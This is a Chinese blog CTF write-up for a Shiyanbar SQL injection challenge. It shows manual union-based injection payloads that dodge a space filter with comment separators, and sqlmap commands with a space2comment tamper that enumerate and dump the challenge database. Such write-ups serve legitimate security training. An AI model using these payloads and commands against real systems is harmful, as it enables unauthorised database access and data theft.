实验吧-web-简单的sql注入2

本系列文集:实验吧-Write up --将持续更新 觉得还不错请给个喜欢,感谢!

SQL注入详细讲解:
DVWA-SQL Injection(SQL注入)
SQL手工注入语句
sqlmap用于sql注入语法

方法一手动注入

简单的注入测试:
1   正常
1'  报错
1' or '1'='1    SQLi detected!
1'or'1'='1      全部数据
以上说明空格被过滤掉

1.查询数据库中的表(用/**/绕过空格)

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

图片.png

发现flag表
2.查询flag表中字段名

1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag

图片.png

发现flag字段名
3.最后构造出poc

1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1

图片.png

方法二sqlmap注入
点击了解sqlmap详细用法:sqlmap用于sql注入语法

1.查询当前数据库(空格被过滤可以使用tamper脚本中space2comment)
python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dbs

图片.png

发现web1数据库
2.查询数据库中的表
python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --tables -D web1

图片.png

发现flag表
3.查询flag表中字段名
python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --columns -T flag -D web1

图片.png

发现flag字段
4.查询字段flag信息
python sqlmap.py -u http://ctf5.shiyanbar.com/web/index_2.php?id=1 --tamper=space2comment --dump -C flag -T flag -D web1

图片.png
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 本系列文集:实验吧-Write up --将持续更新 ...
    简言之_阅读 4,003评论 1 6
  • 关于Mongodb的全面总结 MongoDB的内部构造《MongoDB The Definitive Guide》...
    中v中阅读 32,126评论 2 89
  • [SQL注入攻击] SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式...
    James黄杰阅读 7,706评论 0 30
  • 不知道从什么时候起喜欢养些花花草草,开始的时候什么花草都会枯萎烂根!就连大家说最好养活的绿萝都十盆二十盆的烂根...
    群_9152阅读 3,838评论 0 1
  • 下午放学后儿子幼儿园开了简短的家长会,主题是六一儿童节表演相关安排。我勇跃报名参与和老师一起给孩子们化妆,...
    利利lili阅读 1,228评论 1 1